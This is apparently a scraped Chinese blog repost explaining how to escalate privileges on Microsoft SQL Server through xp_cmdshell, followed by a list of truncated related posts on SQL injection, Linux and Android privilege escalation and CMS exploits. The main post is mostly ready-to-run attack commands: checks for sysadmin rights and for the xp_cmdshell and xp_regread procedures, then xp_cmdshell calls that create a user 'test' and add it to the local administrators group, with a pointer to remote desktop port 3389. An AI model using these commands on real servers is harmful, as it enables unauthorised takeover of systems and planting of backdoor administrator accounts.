2. 程式人生 > >[提權禁區] SQL語句利用xp_cmdshell獲取許可權

[提權禁區] SQL語句利用xp_cmdshell獲取許可權

阿新 發佈:2019-01-10
判斷許可權是不是sa

select is_srvrolemember('sysadmin')

返回是1說明是sa



判斷xp_cmdshell擴充套件儲存是否存在

select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'

返回為l則證明存在



判斷xp_regread擴充套件儲存過程是否存在

select count(*) from master.dbo.sysobjects where name='xp_regread'

返回1證明存在



新增使用者

exec master..xp_cmdshell 'net user test test /add'

exec master..xp_cmdshell 'net localgroup administrators test /add'



後來就是檢視3389埠了,

exec master..xp_cmdshell 'XXXXX'裡面輸入cmd命令就是了

文中資料引用:http://www.wooyun.org/bugs/wooyun-2010-037806

相關推薦

[禁區] SQL語句利用xp_cmdshell獲取許可權

判斷許可權是不是sa select is_srvrolemember('sysadmin') 返回是1說明是sa 判斷xp_cmdshell擴充套件儲存是否存在 select count(*) from master.dbo.sysobjects where xtype =

SQL語句 年月日中獲取月份和日期

表 :ST_RSVRFSR_B 表:ST_RSVR_R 問題:通過關聯stcd關聯兩個表,查找出RZ大於FSLTDZ的欄位,切tm欄位與BGMD和EDMD的日期對應上。 tm是DATETIME型別,BGMD和EDMD是char型別 SQL語句 SELECT

CVE-2014-7911 Android本地漏洞分析與利用

概述 前面我們瞭解了Android Binder機制的基本原理,當然僅僅瞭解是不夠的,我們要做到:Know it and hack it。這篇文章我們就來分析一個和Binder相關的漏洞:CVE-2014-7911。這是由Jann Horn發現的一個Android本

SQL注入中利用XP_cmdshell的用法

先來介紹一下子伺服器的基本情況,windows 2000 adv server 中文版,據稱打過了sp3,asp+iis+mssql 。首先掃描了一下子埠,呵呵,開始的一般步驟。 埠21開放: FTP (Control)埠80開放: HTTP, World Wide Web埠

利用反射生成SQL語句

mman com inf get bool 通過 公開 public .get // 修改學員信息的方法 public bool ModifyStudent(MODEL.Students model) { // 利用反映獲取類對所有屬性,用來動態生成SQL語句

利用linux漏洞

linux漏洞 提權就是讓普通用戶擁有超級用戶的權限。 本次試驗漏洞適用於RHELt或CenOS系列5~6系列所有版本。主要利用/tmp/目錄和/bin/ping命令的權限漏洞進行提權。 試驗環境:騰訊雲CentOS6.8 內核:2.6.32-642.6.2.el6.x86_641.查

獲取EF查詢的SQL語句

text family 表達式 sql spa 處理方法 star 進行 style 在EF編程中我們能夠通過lamda表達式能夠進行查詢數據。獲取到IQueryable<T>結果,我們要想知道詳細的SQL語句是什麽須要使用ObjectQuery<

利用新浪博客做站群 看了分分鐘你也會

SEO優化的過程中網站的權重是關鍵詞排名不可或缺的因素,為了提升網站的權重SEOer通常會利用第三方平臺的高權重為SEO所用,今天給大家講一個關於新浪博客站群的概念以及具體的操作方法。 顧名思義新浪博客站群分解開來通俗點來說就是新浪博客的集群,也就是把一定數量的新浪博客聚集在一起形成一個類似

從getwebshell到繞過安全狗雲鎖再到利用matasploit進服務器

windows 一句話 eno create 遠程 64位 test iis 後臺 本文作者:i春秋簽約作家——酷帥王子 一、 利用getwebshell篇 首先對目標站進行掃描,發現是asp的,直接掃出網站後臺和默認數據庫,下載解密登陸如圖: 下面進後臺發現有fcke

史上最全Linux獲取敏感信息方法

ron tables 快速 結果 my.conf faillog suid rmi rem http://www.freebuf.com/articles/system/23993.html 在本文開始之前,我想指出我不是專家。據我所知,在這個龐大的區域,沒有一個“神奇”

利用SQL語句查詢數據庫中所有表

結果集 sel clas 使用 創建 ref 註意 目錄 tails Oracle: SELECT * FROM ALL_TABLES;--系統裏有權限的表 SELECT * FROM DBA_TABLES;-- 系統表 SELECT * FROM USER_TA

SQL語句執行與結果集的獲取

cat ber byte exc 行緩沖 特定 列數 索引 過程 title: SQL語句執行與結果集的獲取 tags: [OLEDB, 數據庫編程, VC++, 數據庫] date: 2018-01-28 09:22:10 categories: windows 數據庫

MySQL UDF獲取主機控制權

安裝 系統 .py 執行 dex udf 操作 接口 use UDF(User defined function)是MySQL的一個拓展接口,用來擴展MySQL的功能。在具備MySQL管理員訪問權限的條件下,可利用該特性進行提權,獲取所在主機的控制權。下面以windows主

sql語句獲取本周、本月、本年數據

tail cal pos tab post detail ont 上月 arc 本周:select * from table where datediff(week,C_CALLTIME,getdate())=0 --C_CALLTIME 為日期字段本月:selec

mysql中利用sql語句修改字段名稱,字段長度等操作

HA change 是我 重構 不為 ble 技術 網站重構 add 在網站重構中,通常會進行數據結構的修改,所以添加,刪除,增加mysql表的字段是難免的,有時為了方便,還會增加修改表或字段的註釋,把同字段屬性調整到一塊兒。這些操作可以在phpmyadmin或者別的mys

利用phpStudy 探針 網站服務器

sel clas operator aid 根據 表名 lock tracking copyright 聲明: 本教程僅僅是演示管理員安全意識不強,存在弱口令情況.網站被非法入侵的演示,請勿用於惡意用途! 今天看到論壇有人發布了一個通過這phpStudy 探針 關

cakephp獲取最後一條sql語句

ger figure manage 設置 語句 代碼 sql語句 echo data 1.在app\config\core.php中設置Configure::write(‘debug‘, 2); 2.頁面上追加如下代碼: $dbo = ConnectionManage

SQL Server下ADO.NET 怎麽獲取數據庫SQL語句INSERT,UPDATE,DELETE了多少行數據

查詢 行數據 cit per 數據庫連接 into div conn 影響 ADO.NET 在發送SQL語句到SQL Server數據庫後,怎麽知道真正INSERT,UPDATE,DELETE了多少行數據呢? 使用SQL Server內置的全局變量@@ROWCOUNT即可

SqlServer 獲取字符串中小寫字母的sql語句

參數 substr col oss 取字符 apply article lse bsp SQL字符串截取(SubString) 作用:返回第一個參數中從第二個參數指定的位置開始、第三個參數指定的長度的子字符串。 有時候我們會截取字符串中的一些特殊想要的東西,大

齊博cms最新SQL註入網站漏洞 可遠程執行代碼

pid guide oss cms sse str ctu mem 一個 齊博cms整站系統,是目前建站系統用的較多的一款CMS系統,開源,免費,第三方擴展化,界面可視化的操作,使用簡單,便於新手使用和第二次開發,受到許多站長們的喜歡。開發架構使用的是php語言以及mysq